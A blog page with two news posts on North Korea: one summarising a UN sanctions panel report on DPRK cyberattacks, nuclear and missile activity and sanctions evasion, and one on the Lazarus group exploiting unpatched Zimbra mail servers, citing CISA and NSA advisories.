Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label DPRK. Show all posts

Global Authorities Examine 58 Cyberattacks Linked to North Korea, Valued at $3 Billion

 


North Korean sanctions monitors have been investigating dozens of possible cyberattacks by the regime, which are believed to have raised $3 billion to fuel the state's nuclear weapons program, according to excerpts released from an unpublished report by the UN. 

In the executive summary of a new report submitted to the United Nations Security Council obtained Friday by The Associated Press, a panel of experts stated that the number of cyberattacks by North Korean hacking groups that report to the Reconnaissance General Bureau, North Korea’s primary foreign intelligence organization, is continuing to be high. 

This report covers the period from July 2023 to January 2024, and it is based on contributions made by unidentified United Nations representatives. A report sent to the council of 15 nations, compiled from member nations and other sources, was sent in response to the high tensions in the region caused by North Korean leader Kim Jong Un. 

As a result, the United States, South Korea, and Japan have increased their combined military exercises in response to his threat to destroy South Korea if provoked and escalating weapons demonstrations. He threatened to annihilate South Korea if provoked by an escalation of weapons demonstrations. Amid the increased military and political tensions on the Korean Peninsula, the experts said North Korea “continued to flout (U.N.) sanctions,” further developed its nuclear weapons, and produced nuclear fissile materials – the weapons’ key ingredients. 

There was no doubt that the light-water reactor at North Korea's main nuclear complex at Yongbyon appeared to be operational, according to the experts. Despite suspicions that the North may use it as a new source of fissile materials for nuclear weapons, the South Korean defence minister said in late December that the reactor is likely to become operational by the summer. 

A 5-megawatt reactor near Yongbyon, the country that possesses the world's largest nuclear capacity, has been producing weapons-grade plutonium for many years. As an additional source of bomb fuel, this light-water reactor would be a useful addition to the arsenal, and observers have pointed out that, with its larger capacity, it can produce more plutonium. 

Furthermore, Yongbyon has its own facility for enriching uranium, which can enrich uranium up to 99%. According to the panel, North Korea is likely preparing to conduct its seventh nuclear test from Punggye-ri, which would mark the first nuclear test conducted there since 2017. The panel said it has been working on monitoring activities at the nuclear test site. 

It has been estimated that North Korea has nuclear weapons in the range of 20-60 (or more than 100, depending on who is doing the counting) to more than 100. North Korea is thought to be capable of adding between six and 18 bombs per year, according to experts. Kim Jong Un has repeatedly made a promise to build more nuclear weapons and introduce high-technology weapons to deal with what he calls intensifying U.S. hostility since his diplomacy with the U.S. collapsed in 2019. 

According to the panel, at least seven ballistic missiles were launched by the Democratic People's Republic of Korea during the six months that ended in January, including one intercontinental ballistic missile, one intermediate-range missile, and five short-range missiles. That was one of the most numerous rocket launches that the North has ever made, according to the panel. 

A military observation satellite has been successfully launched by the DPRK in orbit, following two failed attempts, experts said Sunday. As part of the North's military arsenal, an old diesel submarine has been modified so that it can be used as a tactical nuclear attack submarine. 

The monitoring panel overseeing U.N. sanctions against North Korea has observed persistent breaches by the DPRK. The country, in defiance of Security Council resolutions, is found to illicitly import refined petroleum products. 

To circumvent maritime sanctions, the DPRK employs a blend of obfuscation techniques. In the year 2023, the recorded trade volume exceeded that of 2022, encompassing a diverse range of consumer goods. Some of these items, deemed luxury goods and prohibited by U.N. sanctions, were included. 

The panel is actively probing reports from member states regarding the DPRK's potential involvement in the arms and ammunition trade, a clear violation of U.N. sanctions. Recent accusations from the United States, Ukraine, and six allies assert Russia's utilization of North Korean ballistic missiles and launchers in devastating aerial attacks against Ukraine, violating U.N. sanctions. South Korea's military, in November, suspected North Korea of exporting various armaments, including short-range ballistic missiles and anti-tank missiles to Russia, contravening U.N. sanctions. 

Throughout the last six months, discernible trends indicate the DPRK's focus on targeting defence companies and supply chains, as well as increased collaboration in infrastructure and tools. The panel has also delved into reports of numerous DPRK nationals working abroad in sectors such as information technology, restaurants, and construction, generating income in violation of U.N. sanctions. 

Additionally, the DPRK persists in accessing the international financial system for illicit financial operations. While U.N. sanctions are designed to spare ordinary North Koreans, the panel acknowledges unintentional repercussions on the humanitarian situation and aspects of aid operations. Nevertheless, the precise impact of sanctions relative to other factors remains challenging to discern.

DPRK Uses Unfixed Zimbra Devices for Spying on Researchers


State-sponsored hackers exploit unpatched Zimbra devices

A recent series of compromises that exploited unpatched Zimbra devices was an operation sponsored by the North Korean government and aimed to steal intelligence from a collection of private and public medical and energy sector researchers. 

Analysts with W labs in a new report explained that due to an overlap in techniques, and thanks to a mess up by one of the threat actors, they attributed the recent series of cyber incidents against unpatched Zimbra devices to the Lazarus group, a well-known cybercriminal group sponsored by the North Korean government. 

A joint report by NSA and Central Security service said "DPRK cyber actors have been using cryptocurrency generated through illicit cybercrime activities to procure infrastructure such as IP addresses and domains. The actors intend to conceal their affiliation and then exploit common vulnerabilities and exposures (CVE) in order to gain access and escalate privileges on targeted networks to perform ransomware activities. Recently observed CVEs include remote code execution in the Apache Log4j software library (also known as "Log4Shell") and remote code execution in various SonicWall appliances."

Lazarus ran a campaign using unpatched Zimbra devices

Lazarus ran this campaign and other likewise intelligence-gathering operations till the end of 2022. The experts have named the campaign "No pineapple" after an error message created by the malware during their investigation. The threat actors quietly stole around 100GB of data, without running any destructive cyber campaign or disrupting information.

Security teams running unpatched, Internet-connected Zimbra Collaboration Suite (ZCS) can assume they are compromised and should take immediate detection and response action. 

A recent security alert by CISA flagged active Zimbra exploits for CVE-2022-24682, CVE-2022-27924, and CVE-2022-27925, which are being chained with CVE-2022-37042, and CVE-2022-30333. 

The cyber attacks lead to remote code execution (RCE) and access to the Zimbra platform. 

Unfixed Zimbra devices can affect sensitive info

The results can be quite dangerous when it comes to protecting sensitive info and shielding email-based follow-on threats. ZCS is a suite of business communication services that consists of an email server and a Web client for accessing messages via the cloud. 

CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC) strongly suggest administrators and users apply the guidelines in the recommendations of the cybersecurity advisory to defend their organization's systems against malicious cyber operations. 

"NSA and the other authoring agencies urge all critical infrastructure entities and organizations, including the Healthcare and Public Health (HPH) Sector, and the Department of Defense and Defense Industrial Base, to apply the mitigations listed in this advisory," said NSA